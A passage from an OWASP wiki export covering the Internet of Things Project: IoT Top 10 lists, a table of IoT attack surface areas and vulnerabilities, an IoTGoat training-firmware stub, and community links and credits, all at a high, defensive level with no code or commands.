*Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
|'''4 - CWE-264'''<br />
|<br />
*Permissions, Privileges, and Access Controls<br />
|-<br />
|'''5 - CWE-200'''<br />
|<br />
*Information Exposure<br />
|-<br />
|'''6 - CWE-255'''<br />
|<br />
*Credentials Management<br />
|-<br />
|'''7 - CWE-287'''<br />
|<br />
*Improper Authentication<br />
|-<br />
|'''8 - CWE-399'''<br />
|<br />
*Resource Management Errors<br />
|-<br />
|'''9 - CWE-79'''<br />
|<br />
*Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|-<br />
|'''10 - CWE-189'''<br />
|<br />
*Numeric Errors<br />
|-<br />
|}{{Social Media Links}}<br />
| valign="top" style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" |<br />
==What is the ICS/SCADA Project?==<br />
The ICS/SCADA Project provides:<br />
*A list of the Top 10 most dangerous software weaknesses<br />
==Project Leaders==<br />
*NJ Ouchn<br />
==Related Projects==<br />
*[[OWASP Mobile Security Project|OWASP Mobile Security]]<br />
*[[OWASP Top Ten Project|OWASP Web Top 10]]<br />
==Collaboration==<br />
[https://owasp-iot-security.slack.com/ The Slack Channel]<br />
==Quick Download==<br />
*Coming Soon<br />
==News and Events==<br />
*Coming Soon<br />
|}<br />
<br />
= IoTGoat =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoTGoat Project ==<br />
<br />
Details coming soon. For information on how to get started with contributing, see the "Project Task List" in the download section. <br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoTGoat Project? ==<br />
<br />
The IoTGoat Project is a deliberately insecure firmware based on OpenWrt. The project’s goal is to teach users about the most common vulnerabilities typically found in IoT devices. The vulnerabilities will be based on the IoT Top 10.<br />
<br />
== Project Leaders ==<br />
<br />
* Aaron Guzman<br />
<br />
== Related Projects ==<br />
<br />
* WebGoat<br />
* Serverless Goat<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* [https://docs.google.com/presentation/d/1SJfabCBxvC3GWnmBCqisO5pyLzkB1-EVcR7s8baT0dE/edit?usp=sharing Project Kick-off Slides]<br />
* [https://strozfriedberg.webex.com/recordingservice/sites/strozfriedberg/recording/playback/5529b228ac514bed8cc050a9dee0f0df Project Kick-off Meeting]<br />
* [https://docs.google.com/spreadsheets/d/1KXX2K7ikkve6wmdfAVu-sZONgKEBuAkRij_paJUgX2w/edit?usp=sharing Project Task List]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;"></div><br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=248641OWASP Internet of Things Project2019-03-12T03:12:26Z<p>Aaron.guzman: /* OWASP Internet of Things (IoT) Project */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
== OWASP Internet of Things (IoT) Project ==<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has been released![[File:OWASP 2018 IoT Top10 Final.jpg|center|thumb|1301x1301px]]<br />
<br />
== Philosophy ==<br />
The OWASP Internet of Things Project was started in 2014 as a way help Developers, Manufacturers, Enterprises, and Consumers to make better decisions regarding the creation and use of IoT systems.<br />
<br />
This continues today with the 2018 release of the OWASP IoT Top 10, which represents the top ten things to avoid when building, deploying, or managing IoT systems. The primary theme for the 2018 OWASP Internet of Things Top 10 is simplicity. Rather than having separate lists for risks vs. threats vs. vulnerabilities—or for developers vs. enterprises vs. consumers—the project team elected to have a single, unified list that captures the top things to avoid when dealing with IoT Security.<br />
<br />
The team recognized that there are now dozens of organizations releasing elaborate guidance on IoT Security—all of which are designed for slightly different audiences and industry verticals. We thought the most useful resource we could create is a single list that addresses the highest priority issues for manufacturers, enterprises, and consumers at the same time.<br />
<br />
The result is the [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf 2018 OWASP IoT Top 10].<br />
<br />
== Methodology ==<br />
The project team is a collection of volunteer professionals from within the security industry, with experience spanning multiple areas of expertise, including: manufacturers, consulting, security testers, developers, and many more.<br />
<br />
The project was conducted in the following phases:<br />
# '''Team Formation''': finding people who would be willing to contribute to the 2018 update, both as SMEs and as project leaders to perform various tasks within the duration of the project.<br />
# '''Project Review:''' analysis of the 2014 project to determine what’s changed in the industry since that release, and how the list should be updated given those changes.<br />
# '''Data Collection''': collection and review of multiple vulnerability sources (both public and private), with special emphasis on which issues caused the most actual impact and damage.<br />
# '''Sister Project Review''': a review of dozens of other IoT Security projects to ensure that we’d not missed something major and that we were comfortable with both the content and prioritization of our release. Examples included: [https://cloudsecurityalliance.org/artifacts/csa-iot-controls-matrix/ CSA IoT Controls Matrix], [https://api.ctia.org/wp-content/uploads/2018/08/CTIA-IoT-Cybersecurity-Certification-Test-Plan-V1_0.pdf CTIA], [http://iot.stanford.edu/ Stanford’s Secure Internet of Things Project], [https://nvlpubs.nist.gov/nistpubs/ir/2018/NIST.IR.8200.pdf NISTIR 8200], [https://www.enisa.europa.eu/publications/baseline-security-recommendations-for-iot/at_download/fullReport ENISA IoT Baseline Report], [https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/747413/Code_of_Practice_for_Consumer_IoT_Security_October_2018.pdf Code of Practice for Consumer IoT Security,] and others.<br />
# '''Community Draft Feedback''': release of the draft to the community for review, including multiple Twitter calls for comments, the use of a public feedback form, and a number of public talks where feedback was gathered. The feedback was then reviewed by the team along with initial Data Collection, as well as Sister Project Review, to create the list contents and prioritization.<br />
# '''Release:''' release of the project to the public in December 2018.<br />
<br />
== The Future of the OWASP IoT Top 10 ==<br />
The team has a number of activities planned to continue improving on the project going forward.<br />
<br />
Some of the items being discussed include:<br />
* Continuing to improve the list on a two-year cadence, incorporating feedback from the community and from additional project contributors to ensure we are staying current with issues facing the industry.<br />
* Mapping the list items to other OWASP projects, such as the ASVS, and perhaps to other projects outside OWASP as well.<br />
* Expanding the project into other aspects of IoT—including embedded security, ICS/ SCADA,etc.<br />
* Adding use and abuse cases, with multiple examples, to solidify each concept discussed.<br />
* Considering the addition of reference architectures, so we can not only tell people what to avoid, but how to do what they need to do securely.<br />
<br />
Participation in the OWASP IoT Project is open to the community. We take input from all participants — whether you’re a developer, a manufacturer, a penetration tester, or someone just trying to implement IoT securely. You can find the team meeting every other Friday in the the #iot-security room of the OWASP Slack Channel.<br />
<br />
'''''The OWASP IoT Security Team, 2018'''''<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
* Vishruta Rudresh<br />
* Aaron Guzman<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== IoT Top 2018 Contributors ==<br />
* Vijayamurugan Pushpanathan <br />
* Alexander Lafrenz <br />
* Masahiro Murashima <br />
* Charlie Worrell <br />
* José A. Rivas (jarv) <br />
* Pablo Endres <br />
* Ade Yoseman <br />
* Cédric Levy-Bencheotn<br />
* Jason Andress<br />
* Amélie Didion - Designer<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
<br />
* I2 Insecure Network Services<br />
<br />
* I3 Insecure Ecosystem Interfaces<br />
<br />
* I4 Lack of Secure Update Mechanism<br />
<br />
* I5 Use of Insecure or Outdated Components<br />
<br />
* I6 Insufficient Privacy Protection<br />
<br />
* I7 Insecure Data Transfer and Storage<br />
<br />
* I8 Lack of Device Management<br />
<br />
* I9 Insecure Default Settings<br />
<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
